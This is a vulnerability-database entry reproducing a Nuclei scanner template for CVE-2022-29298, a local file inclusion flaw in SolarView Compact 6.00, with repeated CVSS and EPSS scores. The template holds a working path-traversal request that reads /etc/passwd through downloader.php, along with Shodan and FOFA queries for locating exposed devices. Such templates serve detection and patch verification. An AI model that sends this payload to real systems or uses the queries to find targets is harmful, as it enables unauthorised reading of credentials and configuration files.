Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-29298
HistoryJul 06, 2022 - 4:37 p.m.

SolarView Compact 6.00 - Local File Inclusion

2022-07-0616:37:41
ProjectDiscovery
github.com
3

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.137 Low

EPSS

Percentile

95.7%

SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.

id: CVE-2022-29298

info:
  name: SolarView Compact 6.00 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00.
  reference:
    - https://www.exploit-db.com/exploits/50950
    - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view
    - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29298
    - https://github.com/20142995/pocsuite3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-29298
    cwe-id: CWE-22
    epss-score: 0.1374
    epss-percentile: 0.95497
    cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: sv-cpt-mc310_firmware
    shodan-query:
      - http.html:"SolarView Compact"
      - http.html:"solarview compact"
    fofa-query: body="solarview compact"
  tags: cve,cve2022,lfi,solarview,edb,contec

http:
  - method: GET
    path:
      - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009e18195ec5979f1fe2da771f13830432e20170dc1396344752bb9f99c689375602207affe56acc3b7989829c58b3a5993a9ea937ee6d4a80f0eadfb5643ebb701e6d:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.137 Low

EPSS

Percentile

95.7%

Related for NUCLEI:CVE-2022-29298